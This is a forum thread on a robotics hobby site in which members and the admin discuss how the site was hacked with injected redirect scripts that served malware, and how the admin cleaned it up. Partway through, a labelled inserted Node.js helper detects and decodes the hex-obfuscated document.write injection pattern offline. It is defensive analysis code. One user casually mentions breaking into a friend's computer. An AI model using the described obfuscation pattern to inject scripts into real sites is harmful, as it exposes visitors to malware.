Yay for Admin! Although it is kind of sad that there are lowlifes who sit at home all day trying to do this kind of stuff, and for what? To piss off a small community of people who just want to share knowledge? Low.
@superchiku, haven't you read this thread yet? And because they can, and want to piss someone off instead of getting a job.
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 07, 2009, 01:59:51 AM
lol... don't say that... some days back I also hacked into my friend's computer connected via the local network... just for fun... but then cracking is really bad.... I tell young enthusiastic people not to do such things... but do they listen...
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 07, 2009, 02:03:54 AM
Well, we've all played pranks on friends, but this isn't one of Admin's friends (I hope). This guy was trying to upload porn and shiz like that.
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 07, 2009, 02:04:54 AM
Find his IP... destroy him with an e-bomb then...
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 07, 2009, 03:27:41 AM
I don't think we want to do that, superchiku. Sending an e-bomb to a hacker would seem appropriate, but I doubt anyone here would be able to make a complex enough one. And anyway, we just want to keep him/her out of the site, as it is not our job to deal with these people.
Title: Re: Trojan horse on SoR??
Post by: Joesavage1 on April 07, 2009, 04:45:00 AM
Wow! So this is what I've missed while I've been too busy building my $50 robot and stuff!!!
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on April 07, 2009, 01:43:02 PM
I was going to take the time to learn how to hack (white hat hacking only) but I decided to take the time to learn programming and robotics instead :P I still have plenty of time for both later on anyway :)
Title: Re: Trojan horse on SoR??
Post by: Admin on April 07, 2009, 10:23:54 PM
I think it's good to understand how hackers get into your systems, to protect yourself from them.
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 07, 2009, 10:36:33 PM
If you want to think like a cracker then you have to know the techniques used by them...

And please, guys, stop using the word hacker... use cracker instead... hackers are good people, not the bad ones...
Title: Re: Trojan horse on SoR??
Post by: offy on April 07, 2009, 11:03:37 PM
Well hackers are good and bad

White Hat Hacker = Helps fix your system
Gray Hat = Just hacks for the heck of it
Black Hat = Hacks your bank account, computer, takes your info so they can get money and ruin your life.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 08, 2009, 12:20:26 AM
Well hackers are good and bad

White Hat Hacker = Helps fix your system
Gray Hat = Just hacks for the heck of it
Black Hat = Hacks your bank account, computer, takes your info so they can get money and ruin your life.
Wow, I never knew there were names for the categories?
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 08, 2009, 01:03:07 AM
Yup, there are... ethical hackers are the good ones... crackers are the bad ones...
Title: Re: Trojan horse on SoR??
Post by: Admin on April 08, 2009, 01:20:18 AM
First, stop hijacking my thread! :P

Second, a cracker is someone who cracks software/passwords, for example before you pirate software you need to generate 'serialz'.

A hacker is just someone who takes things apart to figure out how they work. You can hack into a circuit just like you can hack into a system. Of course, unauthorized access to a system is illegal, but you can hack your own computer and it wouldn't be illegal.
Title: Re: Trojan horse on SoR??
Post by: superchiku on April 08, 2009, 06:32:04 AM
Love it when the admin says "stop hijacking my thread"... I find it very cute...
Title: Re: Trojan horse on SoR??
Post by: Razor Concepts on April 18, 2009, 11:20:34 AM
Every time I go to the SoR main page or any forum page I get a pop up saying "Could not launch Acrobat". What's up?
Title: Re: Trojan horse on SoR??
Post by: Weird Fishes on April 18, 2009, 12:11:03 PM
In safari I get a page that says this site contains malicious code (a Google advisory) and this link: http://google.com/safebrowsing/diagnostic?tpl=safari&site=beebest.cn&hl=en-us. (http://google.com/safebrowsing/diagnostic?tpl=safari&site=beebest.cn&hl=en-us.)
Attached is the warning.
Title: Re: Trojan horse on SoR??
Post by: frank26080115 on April 18, 2009, 04:56:25 PM
Here's the full url
see attached screenshot
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 18, 2009, 05:00:21 PM
Man, if there is another hack admin's gonna be pissed. He just got through the first one and...
Title: Re: Trojan horse on SoR??
Post by: paulstreats on April 18, 2009, 05:24:22 PM
I came to SOR 30 mins ago and suddenly got a message from my firewall "S8ekhV.exe is trying to access the internet". Also a box came up telling me that system files had been changed and I need to insert the windows cd to replace the files. I ran malwarebytes antimalware which found it and removed it.

Just booted my computer again after removing the virus, tested a few websites and nothing happened but as soon as I came to SOR again I get the same as the above.

The reference site I use says S8ekhV.exe is an as yet unknown malware that is capable of creating, removing or modifying files on the host's system.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 18, 2009, 05:28:32 PM
Oh! I guess that's why SoR was down for like half an hour a few hours ago? And I better start scanning my PC...
Title: Re: Trojan horse on SoR??
Post by: frodo on April 19, 2009, 08:56:03 AM
If there are new things like that, it could mess up huge systems, so it needs to be stopped. Sounds quite dangerous, that s8.exe or whatever it's called. I haven't got that warning, although my computer has been freezing a lot and is a hell of a lot slower, so I wonder whether my anti-virus is down.
Title: Re: Trojan horse on SoR??
Post by: Gertlex on April 19, 2009, 08:58:04 AM
Quote
Here's the full url
see attached screenshot

Still happening.

Avast! FTW.
Title: Re: Trojan horse on SoR??
Post by: offy on April 19, 2009, 09:39:15 AM
I am so happy I have Linux, that stupid virus can't touch me =]
Title: Re: Trojan horse on SoR??
Post by: frodo on April 19, 2009, 09:40:11 AM
How can't it touch you if you're on Linux?

EDIT:

On the end of my URL I normally get "index.php", but now I'm getting "http://www.societyofrobots.com/robotforum/index.php?PHPSESSID=29a3927e4259b972fde42827876afc48&". Should I be getting that, and should I normally have ".php" on the end anyway?
Title: Re: Trojan horse on SoR??
Post by: offy on April 19, 2009, 10:00:02 AM
That is cookie data. I don't think it will do any harm, but I'm not too sure.

It can't touch me because Linux does not run .exe files the way XP/Vista and all other Windows OSes do. This virus is a .exe file, so I am safe.
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on April 19, 2009, 11:44:06 AM
It is in fact a hack on the forum. It's been like this for 2 days now. This script was appended to the bottom of the SoR source file:
Quote from: Some hacker jackass's script

Chrome wouldn't let me get on the page but Firefox does. I'm going to be spending the evening scanning my computer lol
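Added example, not code from the thread or from the forum software: a small Node.js analyst helper that recognizes the obfuscation pattern described in the post above (a hex string split up with an empty variable, decoded with parseInt(..., 16) and String.fromCharCode, then written into the page with document.write) and decodes the payload offline instead of executing it. The function names, the regular expressions and the sample page fragment are all constructed for this example.

```javascript
// Tell-tale building blocks of the decoder stub appended to an infected page.
const MARKERS = ['fromCharCode', 'parseInt', 'document.write'];
// A hex string literal followed by one or more "+ var + 'hex'" continuations,
// the splitting trick used to defeat naive signature matching.
const SPLIT_HEX = /'[0-9A-Fa-f]*'(?:\s*\+\s*\w+\s*\+\s*'[0-9A-Fa-f]*')+/;

// Heuristic: all three markers present and a split hex literal in the source.
function looksObfuscated(src) {
  return MARKERS.every(m => src.includes(m)) && SPLIT_HEX.test(src);
}

// Rejoin the pieces of the split hex literal into one run of hex digits.
function extractHex(src) {
  const m = src.match(SPLIT_HEX);
  if (!m) return null;
  return m[0].replace(/'/g, '').split(/\s*\+\s*\w+\s*\+\s*/).join('');
}

// The same transformation the injected stub performs, done without eval or
// document.write, so the analyst sees what would have been written.
function decodeHexPairs(hex) {
  let out = '';
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16));
  }
  return out;
}

// Verdict for one chunk of page source (a page footer, a .js file, ...).
function analyze(src) {
  if (!looksObfuscated(src)) return { suspicious: false, decoded: null };
  const hex = extractHex(src);
  return { suspicious: true, decoded: hex === null ? null : decodeHexPairs(hex) };
}

// Constructed sample: a harmless marker encoded the same way, so the helper
// can be exercised without any real payload.
function toHexPairs(s) {
  return [...s].map(c => c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}
const MARKER_TEXT = '<!-- constructed marker: injected content would go here -->';
const SAMPLE_SOURCE = "var v1e='';var p='" +
  toHexPairs(MARKER_TEXT).match(/.{1,4}/g).join("'+v1e+'") +
  "';document.write(String.fromCharCode(parseInt(p,16)));";
const CLEAN_SOURCE = "document.write('<p>hello</p>');";

console.log(analyze(SAMPLE_SOURCE));  // suspicious: true, decoded marker text
console.log(analyze(CLEAN_SOURCE));   // suspicious: false
```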
Title: Re: Trojan horse on SoR??
Post by: Admin on April 19, 2009, 01:27:54 PM
darnit! >:(

The hack is a redirect to a virus hosted on a Chinese website. Found lots of 'ladies' spam links in my directory, and some redirect scripts added on to both forum and non-forum pages. It uses a PDF as the carrier file for the virus.

The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the recurrence.

It's similar to the last hack, but with some differences, so I'm not sure if it's the same person yet.

Norton Anti-virus quickly caught it.
Title: Re: Trojan horse on SoR??
Post by: daz on April 19, 2009, 01:49:49 PM
Quote
darnit! >:(

The hack is a redirect to a virus hosted on a Chinese website. Found lots of 'ladies' spam links in my directory, and some redirect scripts added on to both forum and non-forum pages. It uses a PDF as the carrier file for the virus.

The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the recurrence.

It's similar to the last hack, but with some differences, so I'm not sure if it's the same person yet.

Norton Anti-virus quickly caught it.
Hi. Not known around here, been interested in robots for a while and bookmarked your site for future reference (been slowly buying the parts needed for the $50 robot).

Now, how recently did you upgrade the forums to 1.1.8? What version did you have previously? Have you been hacked since 1.1.8? I know for a fact ver 1.1.6 was vulnerable. Aside from that, I've heard rumors of a private 1.1.8 exploit but nothing turned up on Google.

Also be aware that yes, other services running on your server can be attacked to inject code into your forums. Ex: Apache, the CP (as it seemed you thought @ homepage), or maybe they just guessed/brute forced your password.

Just felt like stopping by your site today and noticed the bad news :(. I'll probably check back here often until you find out the cause.

Hope those fools learn to get a life... this is really most likely an automated attack. Who would bother to attack a hobbyist site? :/ Anyway... can't wait to build my first robot. Will definitely tack on the rangefinder upgrade hehe... but for now, money's been short + other priorities.

Even if this site is continually being hacked, disable the forums for a while and if it gets hacked again then it's likely it's not a forum exploit (but still could be); but people like me need some awesome guides and hobby hangouts like this place. Oh sure, look at me who has probably 1 post and I came out here to drop a few words - not everyone uses the forum but I'm sure many more have enjoyed this awesome resource without stopping by these forums ;). Take them down if you must, put up another forum software if you really really must.

*Salutes the Admin hobbyist*.
Title: Re: Trojan horse on SoR??
Post by: dellagd on April 19, 2009, 03:51:43 PM
I have McAfee (sorry if it is spelled wrong) and I ran a check and it found nothing. If this virus gets into my computer what could it do?
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 19, 2009, 04:01:29 PM
Yay for admin :) I have Norton 360 and Spybot Search & Destroy and neither found anything on my PC ;D
Title: Re: Trojan horse on SoR??
Post by: paulstreats on April 19, 2009, 05:19:55 PM
Quote
I have McAfee (sorry if it is spelled wrong) and I ran a check and it found nothing. If this virus gets into my computer what could it do?

I log straight on to societyofrobots.com, not straight into the forums, so that might be why you haven't noticed anything. The malware, as I said above, has the ability to read/write/modify files on the host system, so it is likely to be a bot system that wants to use your PC without you knowing.

I haven't had anything tonight so hopefully admin found it.

Maybe the website is being targeted because of keywords like bot or robot etc... It would seem ironic that botnets are targeted at other bot nets and a real robotics website is being targeted due to plain naming conventions :P
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 19, 2009, 05:22:35 PM
Quote
I haven't had anything tonight so hopefully admin found it.
Quote
The hack has been removed, but I haven't figured out how it happened yet. I'll need more time to prevent the recurrence.
And yeah, that would kinda suck if SoR was getting caught in the "crossfire", so to speak :-\
Title: Re: Trojan horse on SoR??
Post by: pomprocker on April 20, 2009, 11:07:31 AM
I think this is cross-site scripting?

http://en.wikipedia.org/wiki/Cross-site_scripting

Here are the vulnerabilities of Simple Machines Forum:

http://web.nvd.nist.gov/view/vuln/search?execution=e1s2
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on April 20, 2009, 01:53:34 PM
Chrome was telling me there was a problem on any page under the SoR.com domain be it the forums or the main page. I tried everything. Admin did find it however and did remove it. Hopefully it will stay gone for a long long time.
Title: Re: Trojan horse on SoR??
Post by: dellagd on April 20, 2009, 03:31:36 PM
When I click here I get redirected back to the forum home page, or at least so it seems.
Maybe this is the result of another hack.
http://www.societyofrobots.com/robotforum/index.php?action=bookmarks
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 20, 2009, 04:10:45 PM
I doubt that would be the result of another hack; the bookmarks page is probably down. In the case that a forum page goes down, normally you are directed to a blank page or the homepage.
Title: Re: Trojan horse on SoR??
Post by: Admin on April 21, 2009, 02:18:49 PM
So it appears I still haven't figured out the security flaw, and it appears several different hackers have all abused it to get to SoR lately. This most recent hacker somehow managed to use four different IP addresses simultaneously during the attack.

I can only do the clean and IP ban technique until I figure out the flaw and patch it :'(

Looking at the logs, SoR is being heavily hit by hundreds of automated attacks daily . . . nothing I can do unfortunately.

As for bookmarks, I apologize but the latest virus clean required me to replace files. Not sure which file I replaced that broke bookmarks and it'll take me a few days to find time to fix it.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 21, 2009, 04:37:54 PM
Thank you admin! We all appreciate what you are doing for us and how time consuming it is. If I'm ever in Thailand I will buy you a cake... but for now, have an e-cookie ;D
Title: Re: Trojan horse on SoR??
Post by: dellagd on April 21, 2009, 05:52:36 PM
e-cookie from me too
(I hope you like virtual chocolate  ;) )
Title: Re: Trojan horse on SoR??
Post by: HDL_CinC_Dragon on April 21, 2009, 07:38:58 PM
4 IPs at once leads me to believe that it's either a botnet or an organized group of people. Not sure why they want to take down SoR so bad buuuut they should stop because that's dumb.

Also, IP banning may not be effective as hackers can bounce their signal through a different machine or network to mask their own IP as someone else's.
Title: Re: Trojan horse on SoR??
Post by: SmAsH on April 21, 2009, 07:58:23 PM
Smart little [email protected]$#ers! Why can't they just build a robot like normal people?
Title: Re: Trojan horse on SoR??
Post by: dellagd on April 22, 2009, 06:12:00 AM
What are they accomplishing anyway?
The fact that we are mad at them?

Hey! They're e-bullies!  :'(

And admin, I know you don't want to hear this,
when I click on bookmarks I still go back to the homepage
but in my web address bar it says I am in bookmarks?
???
Title: Re: Trojan horse on SoR??
Post by: Admin on April 22, 2009, 06:15:36 PM
I got good news and bad news.

Good news is that I figured out how to stop the attacks 100% as a short term solution. Basically I turn off the ability to modify SoR when I'm not editing it.

Bad news is that although it will stop further hacks of this type, I'm still not 100% sure how they got in. I think I know how they did it, but the solution (long term) requires me rewriting the forum GUI all over again.

That means I'll have to turn off like every forum feature and slowly re-add them when I have time.
Title: Re: Trojan horse on SoR??
Post by: TrickyNekro on April 22, 2009, 06:17:01 PM
And how long is this supposed to last???
Title: Re: Trojan horse on SoR??
Post by: Admin on April 22, 2009, 06:20:44 PM
Quote
And how long is this supposed to last???
Well, my hope is that I'll do it all in one day. Basically start at 8am and go till 8pm. I'll plan it for when I'm free all day to minimize the pain for everyone else.

The forum will work the whole time, it's just that the GUI will probably look broken and primitive until I'm finished.
Title: Re: Trojan horse on SoR??
Post by: TrickyNekro on April 22, 2009, 06:23:24 PM
It's your fault we became addicted.... ::)
Title: Re: Trojan horse on SoR??
Post by: voyager2 on July 21, 2010, 11:59:58 PM
Actually bots are robots!
A "normal" robot is real, a bot is software and code.

I've never had a problem with SoR (and hope I never do).
However, around the time I found SoR, a virus invaded my System Volume Information.
Spybot Search And Destroy and AVG anti-virus couldn't remove it as it's a system folder.
Since I couldn't remove it in XP either, I restarted my system, selected the Ubuntu operating system and deleted it manually without problem.
Also found some interesting Windows goodies this way too...
Title: Re: Trojan horse on SoR??
Post by: Admin on July 22, 2010, 06:47:04 AM
I guess I should update this thread . . .


I moved SoR to a new host early this year, meaning I did a fresh install of everything. Assuming I also didn't freshly install the same vulnerability, SoR is clean :P
Title: Re: Trojan horse on SoR??
Post by: voyager2 on July 23, 2010, 06:08:32 AM
Another epic win for Admin!!